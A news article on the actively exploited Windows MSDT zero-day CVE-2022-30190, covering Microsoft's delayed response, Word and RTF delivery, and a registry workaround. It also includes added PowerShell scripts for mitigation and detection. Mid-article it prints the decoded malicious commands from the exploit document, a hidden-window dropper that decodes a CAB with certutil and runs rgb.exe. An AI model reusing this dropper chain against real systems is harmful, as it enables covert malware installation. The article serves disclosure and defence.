
Code execution 0-day in Windows has been under active exploit for 7 weeks


A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. A response dated April 21, however, informed the researchers that the Microsoft Security Response Center team didn’t consider the reported behavior a security vulnerability because, supposedly, the MSDT diagnostic tool required a password before it would execute payloads.

Uh, nevermind

On Monday, Microsoft reversed course, identifying the behavior with the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constituted a critical vulnerability after all.

“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the advisory stated. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

At the time of this story’s publication, Microsoft had yet to issue a patch. Instead, it was advising customers to disable the MSDT URL Protocol by:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
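The three steps above, as an added PowerShell script that is not Microsoft's or the article's own: it refuses to run unless elevated, exports the ms-msdt key before touching it, deletes the key only if the backup succeeded, verifies the result, and keeps a restore function for use once a patch ships. The backup path and the function names are assumptions made for this example.

```powershell
# Added example: back up and remove the ms-msdt URL protocol handler,
# following Microsoft's three-step workaround. Run from an elevated PowerShell.
# The backup location and function names are assumptions for this example.

$KeyPath    = 'HKEY_CLASSES_ROOT\ms-msdt'
$BackupFile = Join-Path $env:SystemDrive 'ms-msdt-backup.reg'   # assumed location

function Test-IsAdministrator {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Disable-MsdtUrlProtocol {
    # Step 1: the registry operations need an elevated session.
    if (-not (Test-IsAdministrator)) {
        throw 'This script must run from an elevated (Administrator) session.'
    }
    if (-not (Test-Path "Registry::$KeyPath")) {
        Write-Host "$KeyPath is not present; nothing to do."
        return
    }

    # Step 2: back up the key so it can be restored after a fix is installed.
    reg export $KeyPath $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0) {
        throw "Backup to $BackupFile failed; leaving $KeyPath in place."
    }

    # Step 3: delete the handler so ms-msdt: URIs no longer launch msdt.exe.
    reg delete $KeyPath /f | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Deleting $KeyPath failed." }

    # Verify the key is really gone before reporting success.
    if (Test-Path "Registry::$KeyPath") {
        throw "$KeyPath still exists after deletion."
    }
    Write-Host "Removed $KeyPath; backup saved to $BackupFile."
}

function Restore-MsdtUrlProtocol {
    # Re-import the exported key once Microsoft has shipped a patch.
    if (-not (Test-Path $BackupFile)) { throw "No backup found at $BackupFile." }
    reg import $BackupFile | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Import of $BackupFile failed." }
    Write-Host "Restored $KeyPath from $BackupFile."
}

Disable-MsdtUrlProtocol
```

The backup-before-delete ordering matters: `reg delete /f` is silent and irreversible, so the script aborts if the export fails rather than leaving the machine without a way back to the original configuration.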

Although initially missed by Microsoft, the vulnerability was again spotted when a researcher identified a Word document uploaded to VirusTotal on Friday that exploited the previously unknown attack vector.

According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That should not be possible,” Beaumont wrote.

Unfortunately, it is possible.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security firm Huntress, the script:

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)
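The behavior described above leaves a simple telemetry signature: an Office application is the parent of msdt.exe. The following is an added PowerShell detection, not code from the article or from Huntress, that scans process-creation records for that parent/child pairing. It assumes records shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the sample records are constructed for this example and are not real telemetry.

```powershell
# Added example: flag process-creation records where an Office application
# spawned msdt.exe, the parent/child pairing this exploit produces.
# Record fields follow Sysmon Event ID 1 (Image, ParentImage, CommandLine);
# the records below are constructed for this example, not real telemetry.

$OfficeParents = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE')

function Test-SuspiciousMsdtLaunch {
    param([Parameter(Mandatory)] $Record)
    $child  = [IO.Path]::GetFileName($Record.Image)
    $parent = [IO.Path]::GetFileName($Record.ParentImage)
    # Office should never need to start the diagnostic tool on its own.
    return ($child -ieq 'msdt.exe') -and ($OfficeParents -contains $parent.ToUpper())
}

function Find-SuspiciousMsdtLaunches {
    param([Parameter(Mandatory)] [object[]] $Records)
    $Records | Where-Object { Test-SuspiciousMsdtLaunch $_ }
}

# Constructed sample records (timestamps, paths and arguments are placeholders).
$SampleRecords = @(
    [pscustomobject]@{
        UtcTime     = '2022-05-30 10:01:02'
        Image       = 'C:\Windows\System32\msdt.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'msdt.exe (arguments omitted)'
    },
    [pscustomobject]@{
        UtcTime     = '2022-05-30 10:01:05'
        Image       = 'C:\Windows\splwow64.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'splwow64.exe (arguments omitted)'
    },
    [pscustomobject]@{
        UtcTime     = '2022-05-30 10:02:10'
        Image       = 'C:\Windows\System32\notepad.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'notepad.exe'
    }
)

$hits = Find-SuspiciousMsdtLaunches -Records $SampleRecords
foreach ($hit in $hits) {
    Write-Host ("ALERT {0}: {1} spawned {2}" -f $hit.UtcTime,
        [IO.Path]::GetFileName($hit.ParentImage), [IO.Path]::GetFileName($hit.Image))
}
```

Only the first constructed record is flagged; Word launching its own print helper and Explorer launching Notepad pass through. In a real deployment the records would come from `Get-WinEvent` against the Sysmon operational log, and the alert would be worth raising even when msdt.exe exits immediately, since the script above shows the payload kills msdt.exe as its first action.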

Beaumont also called attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. That suggests that there was at least one other time the company’s security team failed to grasp the potential for this behavior to be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what’s known as protected view, a mode that disables macros and other potentially harmful functions. For reasons that aren’t clear, Beaumont said, if the document is loaded as a Rich Text Format file, it “runs without even opening the document (via the preview tab in Explorer) let alone Protected View.”

In other words, Huntress researchers wrote, the RTF file can “trigger the invocation of this exploit with just the Preview Pane within Windows Explorer.” In so doing, “this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”

Besides the document uploaded to VirusTotal on Friday, researchers uncovered a separate Word file uploaded on April 12 that exploits the same zero-day.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol isn’t likely to create major disruptions in the short run, and possibly not in the long run either. While investigating—at least until Microsoft releases more details and guidance—Office users should turn the protocol off entirely and give any documents downloaded over the Internet additional scrutiny.
